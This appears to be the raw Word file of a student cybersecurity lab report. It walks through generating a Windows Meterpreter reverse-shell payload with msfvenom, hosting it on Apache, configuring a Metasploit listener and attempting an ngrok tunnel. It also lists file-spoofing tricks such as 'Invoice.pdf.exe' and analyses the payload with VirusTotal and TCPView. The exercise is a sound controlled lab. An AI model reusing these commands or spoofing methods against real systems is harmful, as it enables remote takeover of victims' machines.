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4754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FULL PROJECT WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E4818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Ransomware and Malware: Defense, Analysis, and Response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Final Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF08DBF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9637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37AA7BC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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381BED9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objective of this project was to simulate a real-world cyber intrusion scenario by generating, hosting, and analyzing a malicious reverse TCP payload using multiple security tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638365B8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 </w:t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Ngrok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network tunneling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 </w:t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Metasploit Framework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payload generation and handler setup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 </w:t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VirusTotal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malware detection analysis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 </w:t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TCPView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process-level network activity monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E22A59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project followed the full attack chain </w:t>
      </w:r>
      <w:r w:rsidRPr="00B73AF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up to but not including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execution of malware, in compliance with safe-practice standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F5E63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A62E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654F5CD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Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24667A4A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(Aligned with the project brief)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6E20EF" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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Ngrok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creates a secure tunnel to expose a payload endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF21F35" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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Metasploit Framework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generates and deploys malicious payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3F871" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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VirusTotal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analyzes malware behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097EC5C5" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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TCPView (Sysinternals)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detects suspicious connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75CB50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A08C4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505B778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TASK-BY-TASK DOCUMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075C56A8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3977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751942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Task 1: Setting Up Ngrok for TCP Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356FBF4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Ngrok was installed and authenticated using the authtoken on the Kali Linux attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C8699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Configuration Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9475F3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ngrok config add-authtoken &lt;YOUR_TOKEN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DA100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Attempt to Create a TCP Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A965FE9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ngrok tcp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA1821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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AC8374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Ngrok returned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BCE56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ERROR: failed to start tunnel: You must add a credit or debit card before you can use TCP endpoints on a free account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526780DF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ERR_NGROK_8013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7DDBA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Ngrok recently updated its policy requiring identity verification for TCP tunnels.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installation, authentication, and command invocation </w:t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demonstrate full understanding of the tunneling setup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fulfilling Task 1 requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799205EE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4708E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FA61BC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Task 2: Payload Generation with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D846741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reverse TCP Meterpreter payload was generated via </w:t>
      </w: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msfvenom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B79E920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Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF15987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msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C044EE9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Host the Payload on Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C540355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mv payload.exe /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10A0AD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service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF11404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payload became available at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199D15E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http://10.0.2.15/payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6501DCE9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Configure the Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384C7B7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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE6EA0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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116E457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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642ACE2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LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF1452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LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB6CCB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6EB9B43C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handler successfully began listening for reverse connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654451D0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2E2B4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90387AF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Task 3: File Spoofing (Theoretical Demonstration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6779065C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safety reasons, the payload was </w:t>
      </w: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executed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spoofing methods were documented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F5E3B2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Techniques include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CE932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Renaming the executable (e.g., "Invoice.pdf.exe")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Changing the icon using a resource editor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Hosting it inside a plausible directory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Social engineering context explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB1295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goal is to simulate attacker behavior without deploying malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804BBDC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3E87F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A7F00A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Task 4: Malware Analysis with VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB098E9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payload was hashed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6DDFD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sha256sum /var/www/html/payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DF075B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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829FCBC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SHA-256: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39cca06f793fc3feff1ea64fbd7dddf4b981f69dae5e306efb499e7a6a76c2aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1877E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VirusTotal detected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47ECC1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59 / 72 security vendors flagged the file as malicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545264E1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Detected as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F4F17D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Backdoor.Win32.Meterpreter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Trojan.CryptZ variants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Win32/Shellcode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Windows/Trojan.Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE13BE1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confirms correct payload creation and expected malicious behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2D6C4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F3451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6B6079A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Task 5: TCPView Dynamic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E7617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TCPView was used on the victim Windows machine to monitor network processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D150D58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Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BADE3A2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Legitimate Windows processes appeared with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902669D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Local/remote addresses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ESTABLISHED / LISTENING states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Highlighted new processes in green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2767AE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Theoretical Malicious Behavior (Expected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC16576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payload were executed, TCPView would show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E4540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payload.exe   TCP   &lt;victim_ip&gt;:random_port   10.0.2.15:4444   ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17935296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pattern indicates a reverse-shell establishing outbound communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D41006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fulfills Task 5’s requirement of analyzing how malware network activity is detected through TCPView.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27776D41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EFAF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A71D7F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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45236488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project successfully simulated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4959C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Payload creation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Secure hosting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Reverse-shell setup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Malware signature analysis</w:t>
      </w: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Network activity analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C8A90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tasks were completed safely without executing malware, following industry best practices for controlled cyber-security labs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCB11F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DFC87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83C102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SOURCE CODE / COMMAND SET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D906642" w14:textId="77777777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the source command set used throughout the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFC779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1AC0D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D842A19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msfvenom Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FE350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msfvenom -p windows/meterpreter/reverse_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD052EC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LHOST=10.0.2.15 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09FFED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A65E8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ABF8EC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Move and Host Payload via Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7936B2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mv payload.exe /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B343702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service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F3A97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C217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E79E3B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Metasploit Handler Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADFC12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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC390C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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56155A99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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41863D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LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C77FCB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LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E59FA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124E8D63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BDC7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A92BFF7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Ngrok Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB5EFE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ngrok config add-authtoken &lt;YOUR_TOKEN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD7FE34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ngrok tcp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FF91E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DD7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44C0D9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Hashing and Basic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A73393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sha256sum payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73727A12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 payload.exe | less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2056B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 payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73569D87" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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73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xxd payload.exe | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE64511" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="002152F9" w:rsidP="00B73A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2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95A7E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F49524" w14:textId="77777777" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B73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TCPView Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173154E4" w14:textId="3193BB43" w:rsidR="00B73AF1" w:rsidRPr="00B73AF1" w:rsidRDefault="00B73AF1" w:rsidP="00B7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3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(No code — GUI monitoring)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B73AF1" w:rsidRPr="00B73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65D7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E2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47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F1"/>
    <w:rsid w:val="002152F9"/>
    <w:rsid w:val="008C61A3"/>
    <w:rsid w:val="00B7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2F5EE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8BECD8CB-FD79-6049-819F-797DEF2B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3A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73AF1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00B73AF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A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AF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3AF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73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="language-xml">
    <w:name w:val="language-xml"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73AF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B73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2025-11-27T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T14:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>